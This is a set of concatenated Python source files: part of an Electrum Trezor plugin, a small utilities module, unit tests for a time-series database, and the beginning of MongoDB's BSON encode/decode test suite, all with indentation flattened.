script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
utils.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from collections import OrderedDict
import uuid
import sys
import hashlib
import binascii
from functools import wraps
import os
import pwd
import os.path
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
if sys.version_info.major == 2:
import codecs
def str_to_bytes(value):
if isinstance(value, (bytes, bytearray)):
return bytes(value)
elif isinstance(value, unicode):
return codecs.encode(value, 'utf8')
else:
raise TypeError("require text, bytes, or bytearray")
def decode_hex(s):
if isinstance(s, bytearray):
s = str(s)
if not isinstance(s, (str, unicode)):
raise TypeError('require str or unicode')
return s.decode('hex')
def encode_hex(s):
if isinstance(s, bytearray):
s = str(s)
if not isinstance(s, (str, unicode)):
raise TypeError('require instance of str or unicode')
return s.encode('hex')
else:
def str_to_bytes(value):
if isinstance(value, bytearray):
value = bytes(value)
if isinstance(value, bytes):
return value
return bytes(value, 'utf-8')
def decode_hex(s):
if isinstance(s, str):
return bytes.fromhex(s)
if isinstance(s, (bytes, bytearray)):
return binascii.unhexlify(s)
raise TypeError('require instance of str or bytes')
def encode_hex(b):
if isinstance(b, str):
b = bytes(b, 'utf-8')
if isinstance(b, (bytes, bytearray)):
return str(binascii.hexlify(b), 'utf-8')
raise TypeError('require instance of str or bytes')
def to_string(value):
    if value is not None:
if isinstance(value, (bytes, bytearray)):
value = value.decode()
else:
value = str(value)
return value
def to_bytes(value):
return str_to_bytes(value)
def is_int(i):
try:
assert not is_string(i)
i = int(i)
return True
    except (AssertionError, ValueError, TypeError):
return False
def is_string(s):
try:
return isinstance(s, basestring)
except NameError:
return isinstance(s, str)
def generateuid():
return uuid.uuid4().hex
def md5(txt):
assert txt
txt = to_bytes(txt)
return hashlib.md5(txt).hexdigest()
def coroutine(func):
def _(*args,**kwargs):
cr = func(*args,**kwargs)
next(cr)
return cr
return _
def thread(func):
from threading import Thread
@wraps(func)
def _(*args, **kwargs):
t = Thread(target = func, args = args, kwargs = kwargs)
t.daemon = True
t.start()
return t
return _
def process(func):
from multiprocessing import Process
@wraps(func)
def _(*args, **kwargs):
p = Process(target = func, args = args, kwargs = kwargs)
p.start()
return p
return _
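# A minimal usage sketch of the decorators above: @thread runs the wrapped
# function on a daemon thread and returns the started Thread; @coroutine
# primes a generator-based coroutine so it is immediately ready for .send().
if __name__ == '__main__':
    @thread
    def background_md5(txt):
        print(md5(txt))

    @coroutine
    def printer():
        while True:
            line = (yield)
            print(to_string(line))

    background_md5('hello').join()  # wait for the daemon thread to finish
    p = printer()
    p.send(b'world')  # prints 'world' via to_string()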
|
test_tsdb.py
|
import unittest
import multiprocessing
import time
from timeseries import TimeSeries
from tsdb.persistentdb import PersistentDB
from tsdb.tsdb_client import *
from tsdb.tsdb_server import TSDBServer
from tsdb.tsdb_error import *
import numpy as np
from scipy.stats import norm
schema = {
    'pk': {'type': str, 'index': None},  # will be indexed anyway
'ts': {'index': None},
'order': {'type': int, 'index': 1},
'mean': {'type': float, 'index': 1},
'std': {'type': float, 'index': 1},
'vp': {'type': bool, 'index': 1}
}
def tsmaker(m, s, j):
"returns metadata and a time series in the shape of a jittered normal"
t = np.arange(0.0, 1.0, 0.01)
v = norm.pdf(t, m, s) + j*np.random.randn(100)
return TimeSeries(t, v)
class MyTest(unittest.TestCase):
def test_badinput(self):
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':int}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, threshold='a')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 12, dbname='testdb', overwrite=True, threshold='a')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, wordlength='a')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, threshold=-10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, wordlength=-10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=-10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, wordlength=10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, tslen=300)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, tslen='256')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, tslen=8)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=10.5)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=128)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', load='yes')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite='yes')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname=123, overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'DELETE':{'type':bool, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'mean:ie':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'mean':{'type':dict, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB([{'type':str, 'index':None}, {'type':float, 'index':1}], 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':int, 'index':None}, 'mean':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'd_vp-mean':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'vp':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'vp':{'type':bool, 'index':1}}, 'mean', dbname='testdb', overwrite=True)
def test_db_tsinsert(self):
ts1 = TimeSeries([1,2,3],[4,5,6])
ts2 = TimeSeries([1,2,3],[4,5,6])
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
db.insert_ts('ts1', ts1)
with self.assertRaises(ValueError):
db.insert_ts('ts1', ts2)
with self.assertRaises(ValueError):
db.insert_ts('ts:1', ts2)
with self.assertRaises(ValueError):
db.insert_ts('ts1', [[1,2,3],[4,5,6]])
db.insert_ts('ts2', ts2)
db.insert_ts('ts3', ts2)
def test_db_upsertmeta(self):
ts1 = TimeSeries([1,2,3],[4,5,6])
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db.upsert_meta('ts1', {'mean':5})
db.insert_ts('ts1', ts1)
with self.assertRaises(ValueError):
db.upsert_meta('ts1', 'mean' == 5)
db.upsert_meta('ts1', {'mean':5})
def test_db_select(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
db.insert_ts('one', TimeSeries([1,2,3],[4,5,6]))
db.insert_ts('two', TimeSeries([7,8,9],[3,4,5]))
db.insert_ts('negone', TimeSeries([1,2,3],[-4,-5,-6]))
db.upsert_meta('one', {'order':3})
db.upsert_meta('one', {'order':1, 'mean':5})
db.upsert_meta('two', {'order':2, 'mean':4})
db.upsert_meta('negone', {'order':-1, 'mean':-5})
with self.assertRaises(ValueError):
db.select(meta=None, fields=None)
with self.assertRaises(ValueError):
db.select(meta=None, fields='mean')
pks, fields = db.select(meta={}, fields=None)
self.assertEqual(set(pks), set(['one', 'two', 'negone']))
self.assertEqual(len(fields[0]), 0)
pks, fields = db.select(meta={}, fields=[])
self.assertEqual(set(pks), set(['one', 'two', 'negone']))
self.assertEqual(fields[pks.index('one')]['order'], 1)
pks, fields = db.select(meta={'mean':5}, fields=None)
self.assertEqual(set(pks), set(['one']))
pks, fields = db.select(meta={'mean':{'<=':4}}, fields=None)
self.assertEqual(set(pks), set(['two', 'negone']))
pks, fields = db.select(meta={'mean':5}, fields=['order'])
self.assertEqual(fields[0]['order'], 1)
pks, fields = db.select(meta={}, fields=None, additional={'sort_by':'+order'})
self.assertEqual(pks, ['negone', 'one', 'two'])
pks, fields = db.select(meta={}, fields=None, additional={'sort_by':'-order'})
self.assertEqual(pks, ['two', 'one', 'negone'])
pks, fields = db.select(meta={}, fields=None, additional={'sort_by':'-order', 'limit':2})
self.assertEqual(pks, ['two', 'one'])
def test_simsearch(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
m = np.random.uniform(low=0.0, high=1.0)
s = np.random.uniform(low=0.05, high=0.4)
j = np.random.uniform(low=0.05, high=0.2)
query = tsmaker(m, s, j)
with self.assertRaises(ValueError): # No similarity search w/o vantage points
closest = db.simsearch(query)
for i in range(5):
db.add_vp()
closest = db.simsearch(query)
def test_simsearchSAX(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
m = np.random.uniform(low=0.0, high=1.0)
s = np.random.uniform(low=0.05, high=0.4)
j = np.random.uniform(low=0.05, high=0.2)
query = tsmaker(m, s, j)
closest = db.simsearch_SAX(query)
def test_trees(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
new_ts = tsmaker(m, s, j)
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
db.upsert_meta("ts-{}".format(i), {'mean':new_ts.mean(), 'std':new_ts.std()})
randi = set(np.random.randint(0,n_add, size=5))
for i in randi:
db.delete_ts("ts-{}".format(i))
pks, fields = db.select(meta={'mean':{'<=':0.5}, 'std':{'>':2}}, fields=['mean', 'std'])
for row in fields:
self.assertLessEqual(row['mean'], 0.5)
self.assertGreater(row['std'], 2)
def test_load_del(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
saveinfo = {}
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
new_ts = tsmaker(m, s, j)
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
db.upsert_meta("ts-{}".format(i), {'mean':new_ts.mean(), 'std':new_ts.std()})
saveinfo["ts-{}".format(i)] = new_ts.mean()
db.add_vp("ts-4")
db.add_vp()
db.delete_ts("ts-4")
pks, fields = db.select(meta={'vp':True}, fields=None)
self.assertEqual(len(pks),1)
newdb = PersistentDB(schema, 'pk', dbname='testdb', load=True)
pks, fields = db.select(meta={}, fields=['mean'])
self.assertEqual(len(pks), n_add-1)
self.assertTrue("ts-4" not in pks)
for i in range(0,n_add-1):
self.assertEqual(fields[i]['mean'], saveinfo[pks[i]])
############## TEST WORKS ON LOCAL MACHINE BUT NOT IN TRAVIS #################################
#def test_client_ops(self):
# schema["d_t3"] = {'convert': float, 'index': 1}
# db = DictDB(schema, 'pk')
# server = TSDBServer(db)
# def tests(self,t):
# client = TSDBClient()
# t1 = TimeSeries([0,1,2],[4,5,6])
# t2 = TimeSeries([0,1,2],[5,5,5.5])
# t3 = TimeSeries([0,1,2],[6,7,8])
# client.add_trigger('stats', 'insert_ts', ['mean', 'std'], None)
# client.insert_ts('t1',t1)
# client.remove_trigger('stats', 'insert_ts')
# client.add_trigger('corr', 'upsert_meta', ['d-t3'], t3)
# client.upsert_meta('t1',{'order':2, 'blarg':1})
# client.insert_ts('t2', t2)
# client.upsert_meta('t2',{'order':1, 'blarg':0})
# _, res = client.select(fields = ['mean'])
# self.assertTrue('t1' in res)
# self.assertTrue('mean' not in res['t2'])
# client.remove_trigger('corr', 'upsert_meta')
# client.insert_ts('t3', t3)
# client.upsert_meta('t3',{'order':1, 'blarg':0})
# _, res = client.select(fields = ['d-t3'])
# self.assertTrue('d-t3' not in res['t3'])
# _, res = client.select(fields=['mean','std'])
# self.assertEqual(5,res['t1']['mean'])
# self.assertEqual(t1.std(),res['t1']['std'])
# with self.assertRaises(TypeError):
# client.insert_ts(t1)
# _, res = client.insert_ts('t1',t1)
# self.assertEqual(_,TSDBStatus.INVALID_KEY)
# _, res = client.augmented_select('corr',['distance'],arg=t3, metadata_dict={'order':{'<':3}, 'blarg':{'<=':1}})
# self.assertTrue(res['t1']['distance'] < 1e-10)
# self.assertTrue(res['t2']['distance'] > 1e-10)
# with self.assertRaises(ValueError):
# _, res = client.augmented_select('corr',['distance'], metadata_dict={'order':{'<':3}, 'blarg':{'<=':1}})
# t.terminate()
# t = multiprocessing.Process(target=server.run)
# t.start()
# time.sleep(0.5)
# tests(self,t)
# t.terminate()
suite = unittest.TestLoader().loadTestsFromTestCase(MyTest)
unittest.TextTestRunner().run(suite)
|
test_bson.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the bson module."""
import array
import collections
import datetime
import mmap
import os
import re
import sys
import tempfile
import uuid
import pickle
from collections import abc, OrderedDict
from io import BytesIO
sys.path[0:0] = [""]
import bson
from bson import (BSON,
decode,
decode_all,
decode_file_iter,
decode_iter,
encode,
EPOCH_AWARE,
is_valid,
Regex)
from bson.binary import Binary, UuidRepresentation
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.int64 import Int64
from bson.objectid import ObjectId
from bson.dbref import DBRef
from bson.son import SON
from bson.timestamp import Timestamp
from bson.errors import (InvalidBSON,
InvalidDocument)
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.tz_util import (FixedOffset,
utc)
from test import qcheck, unittest
from test.utils import ExceptionCatchingThread
class NotADict(abc.MutableMapping):
"""Non-dict type that implements the mapping protocol."""
def __init__(self, initial=None):
if not initial:
self._dict = {}
else:
self._dict = initial
def __iter__(self):
return iter(self._dict)
def __getitem__(self, item):
return self._dict[item]
def __delitem__(self, item):
del self._dict[item]
def __setitem__(self, item, value):
self._dict[item] = value
def __len__(self):
return len(self._dict)
def __eq__(self, other):
if isinstance(other, abc.Mapping):
return all(self.get(k) == other.get(k) for k in self)
return NotImplemented
def __repr__(self):
return "NotADict(%s)" % repr(self._dict)
class DSTAwareTimezone(datetime.tzinfo):
def __init__(self, offset, name, dst_start_month, dst_end_month):
self.__offset = offset
self.__dst_start_month = dst_start_month
self.__dst_end_month = dst_end_month
self.__name = name
def _is_dst(self, dt):
return self.__dst_start_month <= dt.month <= self.__dst_end_month
def utcoffset(self, dt):
return datetime.timedelta(minutes=self.__offset) + self.dst(dt)
def dst(self, dt):
if self._is_dst(dt):
return datetime.timedelta(hours=1)
return datetime.timedelta(0)
def tzname(self, dt):
return self.__name
class TestBSON(unittest.TestCase):
def assertInvalid(self, data):
self.assertRaises(InvalidBSON, decode, data)
def check_encode_then_decode(self, doc_class=dict, decoder=decode,
encoder=encode):
# Work around http://bugs.jython.org/issue1728
if sys.platform.startswith('java'):
doc_class = SON
def helper(doc):
self.assertEqual(doc, (decoder(encoder(doc_class(doc)))))
self.assertEqual(doc, decoder(encoder(doc)))
helper({})
helper({"test": "hello"})
self.assertTrue(isinstance(decoder(encoder(
{"hello": "world"}))["hello"], str))
helper({"mike": -10120})
helper({"long": Int64(10)})
helper({"really big long": 2147483648})
helper({"hello": 0.0013109})
helper({"something": True})
helper({"false": False})
helper({"an array": [1, True, 3.8, "world"]})
helper({"an object": doc_class({"test": "something"})})
helper({"a binary": Binary(b"test", 100)})
helper({"a binary": Binary(b"test", 128)})
helper({"a binary": Binary(b"test", 254)})
helper({"another binary": Binary(b"test", 2)})
helper(SON([('test dst', datetime.datetime(1993, 4, 4, 2))]))
helper(SON([('test negative dst',
datetime.datetime(1, 1, 1, 1, 1, 1))]))
helper({"big float": float(10000000000)})
helper({"ref": DBRef("coll", 5)})
helper({"ref": DBRef("coll", 5, foo="bar", bar=4)})
helper({"ref": DBRef("coll", 5, "foo")})
helper({"ref": DBRef("coll", 5, "foo", foo="bar")})
helper({"ref": Timestamp(1, 2)})
helper({"foo": MinKey()})
helper({"foo": MaxKey()})
helper({"$field": Code("function(){ return true; }")})
helper({"$field": Code("return function(){ return x; }", scope={'x': False})})
def encode_then_decode(doc):
return doc_class(doc) == decoder(encode(doc), CodecOptions(
document_class=doc_class))
qcheck.check_unittest(self, encode_then_decode,
qcheck.gen_mongo_dict(3))
def test_encode_then_decode(self):
self.check_encode_then_decode()
def test_encode_then_decode_any_mapping(self):
self.check_encode_then_decode(doc_class=NotADict)
def test_encode_then_decode_legacy(self):
self.check_encode_then_decode(
encoder=BSON.encode,
decoder=lambda *args: BSON(args[0]).decode(*args[1:]))
def test_encode_then_decode_any_mapping_legacy(self):
self.check_encode_then_decode(
doc_class=NotADict, encoder=BSON.encode,
decoder=lambda *args: BSON(args[0]).decode(*args[1:]))
def test_encoding_defaultdict(self):
dct = collections.defaultdict(dict, [('foo', 'bar')])
encode(dct)
self.assertEqual(dct, collections.defaultdict(dict, [('foo', 'bar')]))
def test_basic_validation(self):
self.assertRaises(TypeError, is_valid, 100)
self.assertRaises(TypeError, is_valid, "test")
self.assertRaises(TypeError, is_valid, 10.4)
self.assertInvalid(b"test")
# the simplest valid BSON document
self.assertTrue(is_valid(b"\x05\x00\x00\x00\x00"))
self.assertTrue(is_valid(BSON(b"\x05\x00\x00\x00\x00")))
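        # (Layout of that minimal document: a 4-byte little-endian int32 giving
        # the total size, 0x05 = 5 bytes, followed immediately by the 0x00
        # document terminator and no elements.)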
# failure cases
self.assertInvalid(b"\x04\x00\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x01")
self.assertInvalid(b"\x05\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x07\x00\x00\x00\x02a\x00\x78\x56\x34\x12")
self.assertInvalid(b"\x09\x00\x00\x00\x10a\x00\x05\x00")
self.assertInvalid(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x13\x00\x00\x00\x02foo\x00"
b"\x04\x00\x00\x00bar\x00\x00")
self.assertInvalid(b"\x18\x00\x00\x00\x03foo\x00\x0f\x00\x00"
b"\x00\x10bar\x00\xff\xff\xff\x7f\x00\x00")
self.assertInvalid(b"\x15\x00\x00\x00\x03foo\x00\x0c"
b"\x00\x00\x00\x08bar\x00\x01\x00\x00")
self.assertInvalid(b"\x1c\x00\x00\x00\x03foo\x00"
b"\x12\x00\x00\x00\x02bar\x00"
b"\x05\x00\x00\x00baz\x00\x00\x00")
self.assertInvalid(b"\x10\x00\x00\x00\x02a\x00"
b"\x04\x00\x00\x00abc\xff\x00")
def test_bad_string_lengths(self):
self.assertInvalid(
b"\x0c\x00\x00\x00\x02\x00"
b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(
b"\x12\x00\x00\x00\x02\x00"
b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(
b"\x0c\x00\x00\x00\x0e\x00"
b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(
b"\x12\x00\x00\x00\x0e\x00"
b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(
b"\x18\x00\x00\x00\x0c\x00"
b"\x00\x00\x00\x00\x00RY\xb5j"
b"\xfa[\xd8A\xd6X]\x99\x00")
self.assertInvalid(
b"\x1e\x00\x00\x00\x0c\x00"
b"\xff\xff\xff\xfffoobar\x00"
b"RY\xb5j\xfa[\xd8A\xd6X]\x99\x00")
self.assertInvalid(
b"\x0c\x00\x00\x00\r\x00"
b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(
b"\x0c\x00\x00\x00\r\x00"
b"\xff\xff\xff\xff\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\xff\xff"
b"\xff\xff\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x00\x00\x00"
b"\x00\x00\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\xff\xff\xff"
b"\xff\x00\x00\x00")
def test_random_data_is_not_bson(self):
qcheck.check_unittest(self, qcheck.isnt(is_valid),
qcheck.gen_string(qcheck.gen_range(0, 40)))
def test_basic_decode(self):
self.assertEqual({"test": "hello world"},
decode(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74\x00\x0C"
b"\x00\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F"
b"\x72\x6C\x64\x00\x00"))
self.assertEqual([{"test": "hello world"}, {}],
decode_all(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"))
self.assertEqual([{"test": "hello world"}, {}],
list(decode_iter(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00")))
self.assertEqual([{"test": "hello world"}, {}],
list(decode_file_iter(BytesIO(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"))))
def test_decode_all_buffer_protocol(self):
docs = [{'foo': 'bar'}, {}]
bs = b"".join(map(encode, docs))
self.assertEqual(docs, decode_all(bytearray(bs)))
self.assertEqual(docs, decode_all(memoryview(bs)))
self.assertEqual(docs, decode_all(memoryview(b'1' + bs + b'1')[1:-1]))
self.assertEqual(docs, decode_all(array.array('B', bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(docs, decode_all(mm))
def test_decode_buffer_protocol(self):
doc = {'foo': 'bar'}
bs = encode(doc)
self.assertEqual(doc, decode(bs))
self.assertEqual(doc, decode(bytearray(bs)))
self.assertEqual(doc, decode(memoryview(bs)))
self.assertEqual(doc, decode(memoryview(b'1' + bs + b'1')[1:-1]))
self.assertEqual(doc, decode(array.array('B', bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(doc, decode(mm))
def test_invalid_decodes(self):
# Invalid object size (not enough bytes in document for even
# an object size of first object.
# NOTE: decode_all and decode_iter don't care, not sure if they should?
self.assertRaises(InvalidBSON, list,
decode_file_iter(BytesIO(b"\x1B")))
bad_bsons = [
# An object size that's too small to even include the object size,
# but is correctly encoded, along with a correct EOO (and no data).
b"\x01\x00\x00\x00\x00",
# One object, but with object size listed smaller than it is in the
# data.
(b"\x1A\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"),
# One object, missing the EOO at the end.
(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00"),
# One object, sized correctly, with a spot for an EOO, but the EOO
# isn't 0x00.
(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\xFF"),
]
for i, data in enumerate(bad_bsons):
msg = "bad_bson[{}]".format(i)
with self.assertRaises(InvalidBSON, msg=msg):
decode_all(data)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_iter(data))
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(BytesIO(data)))
with tempfile.TemporaryFile() as scratch:
scratch.write(data)
scratch.seek(0, os.SEEK_SET)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(scratch))
def test_invalid_field_name(self):
# Decode a truncated field
with self.assertRaises(InvalidBSON) as ctx:
decode(b'\x0b\x00\x00\x00\x02field\x00')
# Assert that the InvalidBSON error message is not empty.
self.assertTrue(str(ctx.exception))
def test_data_timestamp(self):
self.assertEqual({"test": Timestamp(4, 20)},
decode(b"\x13\x00\x00\x00\x11\x74\x65\x73\x74\x00\x14"
b"\x00\x00\x00\x04\x00\x00\x00\x00"))
def test_basic_encode(self):
self.assertRaises(TypeError, encode, 100)
self.assertRaises(TypeError, encode, "hello")
self.assertRaises(TypeError, encode, None)
self.assertRaises(TypeError, encode, [])
self.assertEqual(encode({}), BSON(b"\x05\x00\x00\x00\x00"))
self.assertEqual(encode({}), b"\x05\x00\x00\x00\x00")
self.assertEqual(encode({"test": "hello world"}),
b"\x1B\x00\x00\x00\x02\x74\x65\x73\x74\x00\x0C\x00"
b"\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C"
b"\x64\x00\x00")
self.assertEqual(encode({"mike": 100}),
b"\x0F\x00\x00\x00\x10\x6D\x69\x6B\x65\x00\x64\x00"
b"\x00\x00\x00")
self.assertEqual(encode({"hello": 1.5}),
b"\x14\x00\x00\x00\x01\x68\x65\x6C\x6C\x6F\x00\x00"
b"\x00\x00\x00\x00\x00\xF8\x3F\x00")
self.assertEqual(encode({"true": True}),
b"\x0C\x00\x00\x00\x08\x74\x72\x75\x65\x00\x01\x00")
self.assertEqual(encode({"false": False}),
b"\x0D\x00\x00\x00\x08\x66\x61\x6C\x73\x65\x00\x00"
b"\x00")
self.assertEqual(encode({"empty": []}),
b"\x11\x00\x00\x00\x04\x65\x6D\x70\x74\x79\x00\x05"
b"\x00\x00\x00\x00\x00")
self.assertEqual(encode({"none": {}}),
b"\x10\x00\x00\x00\x03\x6E\x6F\x6E\x65\x00\x05\x00"
b"\x00\x00\x00\x00")
self.assertEqual(encode({"test": Binary(b"test", 0)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00"
b"\x00\x00\x00\x74\x65\x73\x74\x00")
self.assertEqual(encode({"test": Binary(b"test", 2)}),
b"\x18\x00\x00\x00\x05\x74\x65\x73\x74\x00\x08\x00"
b"\x00\x00\x02\x04\x00\x00\x00\x74\x65\x73\x74\x00")
